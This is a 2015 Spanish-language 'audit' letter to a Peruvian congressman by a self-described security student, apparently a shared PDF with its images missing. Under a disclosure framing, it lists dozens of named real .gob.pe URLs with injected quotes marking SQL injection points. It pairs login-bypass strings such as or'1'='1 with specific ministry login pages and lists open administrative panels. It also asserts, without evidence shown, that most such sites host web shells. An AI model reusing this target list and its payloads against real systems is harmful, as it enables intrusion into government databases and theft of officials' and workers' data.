Auditoriade Los Servicios Gubernamentales Del Perú

Empresa de seguridad informtica
BlacklastSecurity
Auditoria de los servicios

gubernamentales del Per
Ante mano deseo dar un saludo a usted congresista

Yehude Simon, en esta oportunidad deseo brindarle a
usted mi investigacin sobre mi Auditoria a algunos
sistemas webs del Pas, deseo aclarar que no eh hecho
nada malo, ni lo eh aprovechado para un acto de
delincuencia ciberntica, veamos algunos de ellos.
Ttulo: Auditoria de servicios web
Autor: Omar Rodrguez
Editado Por: Omar Rodrguez Copyright 2015
Marcona ICA - Peru
Derechos reservados por el Autor
http://www.blacklast-security.org/index.php
Pgina 1

BlacklastSecurity

Desde el ao 2012 hasta el presente ao se han

generado una cantidad de ataques a los portales del
estado, las cuales son generados por los
ciberdelicuentes, en su mayora los ataques son
otorgados por personas de pases hermanos y los de
mayor relevancia son por los grupos conocidos como
LulzSec Peru, Anonymous, Mexican Hackers, ETC .
Creo que la mayora de los presentes gubernamentales
han sido vctimas de ataques de robo de informacin,
Espionaje, sabotaje, y la violacin de correo electrnico.
Tambin hemos visto ataques directos los servidores
webs como vemos en la siguiente pgina web Zone-H
la cual es un sitio donde se alojan los sitios webs
Defaceados ( hackeados ) por Activistas de la red :
Pgina 2

BlacklastSecurity

Como acabamos de ver es una lista muy extensa, debo

aclarar que segn las estadsticas hay ms de #12000
webs subidas algunas web son Re-hackeadas debo decir
que las web del gobierno .gob.pe son conejillos de indias
para los que aprenden las tcnicas de penetracin
pentesting , porque lo eh visto a lo largo de mi carrera .
Es algo avergonz poner algunas de las conversaciones
que tuve con mis contactos de otros pases, ya que
clasifican que las web del gobierno peruano son de
calidad pobre y para pruebas de Pentest.
Pero Gracias a este documento puedo manifestar que
podemos arreglar este problema tan grande que puede
ser perjudicial para nuestro gobierno, como lo hemos
visto ltimamente los ataques cada vez traen ms
consecuencias a la nacin misma.
Ante mano eh estado 2 horas analizando algunos
servidores web y me di con la sorpresa de errores
perjudiciales de instituciones Grandes, Ante mano espero
le guste.
Pgina 3

BlacklastSecurity

Antes de dar las vulnerabilidades debo aclarar que esta

auditoria es propia y que no me agradara que otra
persona se tome los crditos mos.
Vayamos a los errores SQL:
Qu es un error SQL?
Pgina 4

BlacklastSecurity

SQL significa lenguaje de consulta estructurado, el error SQL son lneas de cdigo mal
formuladas, las cuales son generadas al realizar una consulta al servidor.
Dichos errores se encuentran en las Estructuras como:
MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2,
SQLite, Firebird, Sybase, SAP MaxDB and HSQLDB
Lista de vulnerabilidades SQL de los servidores gob.pe:

Errores METODO GET :
http://www.munpaucartambo.gob.pe/index.php?
option=com_rsgallery2&page=inline&id='30
http://www.municatacaos.gob.pe/detalle_serenazgo.php?id='1
http://www.ins.gob.pe/APS_Tools/eve.asp?id='18904
http://www.municatacaos.gob.pe/turismo/thumb.php?id=48&z='1
http://www.regionhuancavelica.gob.pe/portalweb1/index.php?
option=com_phocagallery&view=category&id=18:ghuaytara&Itemid='151
http://portal.regionamazonas.gob.pe/microsite.php?id='33
http://jovenesalaobra.gob.pe/preguntas?page=183&b=
ttp://www.sisol.gob.pe/home/hs/hs/calendario_agenda.php?fecha=2015-12&codmes=1/2015
Pgina 5

BlacklastSecurity

http://www.mdbsh.gob.pe/detalle-noticia.php?id=31``
http://www.municamana.gob.pe/noticia/detalles.php?id=3``
http://silnet.mintra.gob.pe:8080/silnet/PreviewOfertaEP.jsp?
tarea=cargar&FPEDP_Codigo=75167``
http://silnet.trabajo.gob.pe:8080/silnet/PreviewVacantesPublicas.jsp?
tarea=cargar&V_NUMREG=0000126220`&V_CODINST=20131370998``
http://www.muniindependencia.gob.pe/archivos/ordenanzas.php?anno=1
http://jro.igp.gob.pe/mst10/participants/participants_detail.php?id=12``
http://www.regionsanmartin.gob.pe/noticias.php?codigo=2859``
http://sistemas.indecopi.gob.pe/crtacre/Rep_Metodos_Producto.asp?
ID_Producto=961
http://www.sis.gob.pe/NotaPrensa/a_NotaPrensa.asp?idNoticia='799
http://www.regiontumbes.gob.pe/prensa/NotiP.asp?ID='2417
http://www.osce.gob.pe/subportal.asp?ids='8
http://www.limaeste.gob.pe/Dirsubarea_fotos.asp?IdDireccion=4&IdArea='33
http://www.minsa.gob.pe/oei/servicios/DetalleEstab.asp?id='0000001016
http://www.digesa.minsa.gob.pe/expedientes/detalles.aspx?id='9
http://www.ugelnasca.gob.pe/index.php?p=home_noticia&id=1'68
http://www.minsa.gob.pe/oei/servicios/estab.asp?id='1
http://www.munisurquillo.gob.pe/portal/mm.php?id='1
http://www.drtpetacna.gob.pe/prg_prin/direccion.php?id='1
Pgina 6

BlacklastSecurity

http://www.municolquioc.gob.pe/info.php?id=1&id2='1
http://hospitalnasca.gob.pe/index.php?p'=22
http://www.munilaunionpiura.gob.pe/allnoticias.php?_pagi_pg='2
http://www.sisol.gob.pe/home/hs/especialidades.php?id='16
http://www.drtpetacna.gob.pe/prg_prin/direccion.php?id='1
http://www.munipacocha.gob.pe/index.php?pag=galeria_mostrar&n='36
http://www.munipaijan.gob.pe/calendario.php?idactividad='70
http://mpsm.gob.pe/sondeo_virtual/encuesta.php?id='pred
http://www.regionsanmartin.gob.pe/infotransparencia.php?
anio=Seleccione+un+A%C3%B1o&ct=7
http://www.municatacaos.gob.pe/turismo/thumb.php?id=24&z=1
http://www.munielalto.gob.pe/inicio.php?_pagi_pg='112
http://www.muniventanilla.gob.pe/noticia.php?idPublicacion='709
http://www.sbh.gob.pe/videoteca/videos.php?idvideoteca=VT0005``
http://www.munitayacaja.gob.pe/obras_proyectos/detalles.php?id='OBRA00014
http://www.inpe.gob.pe/contenidosprensa_all.php?direccion='1
http://www.hdhvca.gob.pe/galeria/fotos.php?idgaleriaGAL0001
http://www.hospitalvitarte.gob.pe/portal/mod/transparencia/index.php?
transparencia='112
Errores METODO POST:

Pgina 7

BlacklastSecurity

Credenciales de ataque:
or'1'='1
' or 1=1-http://www.sis.gob.pe/NotaPrensa/Sistema/login.asp
http://ofi.mef.gob.pe/odi/login.asp?mensaje=si
http://www.app.minsa.gob.pe/stdw/Login.asp?
pCodigoEvento=1&pDescripcionError=Usuario%20no%20v%C3%A1lido
http://www.limaeste.gob.pe/administrador/i_login.asp
http://www.mdmorrope.gob.pe/intranet/login.php?tipo=1
http://iinei.inei.gob.pe/iinei/conasis/default.asp?origen=intranet&PATH=iinei.inei.gob.pe
http://www.trujillo.sencico.gob.pe/Login.aspx
PANELES ADMINISTRATIVOS ABIERTOS:

http://www.limaeste.gob.pe/administrador/index.asp
http://www.munipimentel.gob.pe/municipalida/administrador/noticia/consultar.p
hp
http://www.indeci.gob.pe/admin/fckeditor/editor/fckeditor.html
http://app2.inpe.gob.pe/resolucion/Documento/Default.aspx
Las webs que acabo de mencionar solo son algunas de las sientas que faltan
por auditar.
Pgina 8

BlacklastSecurity

Aparte de esos errores tambin existen otros como son XSS

Cross-site scripting Es un error tpico de algunas paginas web ya que crea otro portal donde la
web es afectada por una explotacin " XSS" puede ser modificado en otro plano de web por
medio de script
peligrosos en Html.
Existen dos tipos de XSS
Directa - (llamada tambin persistente) Es un tipo de xss que permite insertar los cdigos
html que permitan insertar " <Script> " o " <Iflame>
Indirecta (llamada tambin reflejada) Este tipo de xss consiste modificar valores que estn
en la pgina web para pasar dos variables de pginas web .
Pgina 9

BlacklastSecurity

Pgina 10

BlacklastSecurity

Pgina 11

BlacklastSecurity

Qu pasara si alguien aprovecho las vulnerabilidades que acabo de presentar y

entre al panel administrativo as como acabo de entrar al consejo de ministros
Pgina 12

BlacklastSecurity

Este es otro Error Critico en el congreso.

Es un milagro que nadie haya explotado este error y Obtenido todas las base de
datos y obtenido informacin de todos los trabajadores, ministros, congresistas
y dems miembros del congreso.
Pgina 13

BlacklastSecurity

Debo aclarar que esta auditora que eh elaborado en este corto tiempo da un
ejemplo de las grandes vulnerabilidades que presente dichos servicios, pero no
solamente esas vulnerabilidades son las nicas, Hay otras de mayor rango
como por ejemplo las vulnerabilidades aprovechadas por #EXPLOIT remotos
que ejercen varios tipos de accesos como Webs y Ordenadores .
Tambin quiero dejar en claro que las entidades estn con Puertas traseras
(Backdoors) que son aplicaciones en php en su mayora son respaldos de
accesos para que los ciberdelincuentes puedan entrar a la red desde su
ORDENADOR ya sea por la terminal en Linux o Windows.
Pgina 14

BlacklastSecurity

La mayor desventaja que cuentan dichos servicios es que el 60 % tiene alojado
una web Shell (que son puertas traseras como el Backdoor) pero son de diseo
Visible como pueden ver en la siguiente imagen de ejemplo:
Tambin puedo manifestar que los correos y contraseas son extrados de

dichas base de datos y pueden ser encriptados para poder entrar y espiarlos sin
Pgina 15

BlacklastSecurity

que se den cuenta (Ah nacen los Espionajes gubernamentales), es el ataque
ms simple y ms fcil que cualquiera puede hacer.
Pero todo es externo, tambin se debe notificar que hay trabajadores internos
en las instituciones que brindan la informacin, y estn enlazados con
miembros de Anonymous Per,
Ante mano deseo agradecer que usted haya ledo mi Auditoria, sin ms que
decir me despido de un fuerte abrazo.
#La Seguridad Informtica esta en las manos de las personas que sepan
manejar los sistemas con tica.
Actualmente soy estudiante de Ingeniera de sistemas en la UPSJB, resido en
marcona.
Atentamente: Omar rodrguez
Pgina 16

Auditoriade Los Servicios Gubernamentales Del Perú

Caricato da

Informazioni sul documento

Titolo originale

Copyright

Formati disponibili

Condividi questo documento

Condividi o incorpora il documento

Opzioni di condivisione

Hai trovato utile questo documento?

Questo contenuto è inappropriato?

Copyright:

Formati disponibili

Auditoriade Los Servicios Gubernamentales Del Perú

Caricato da

Copyright:

Formati disponibili

Empresa de seguridad informtica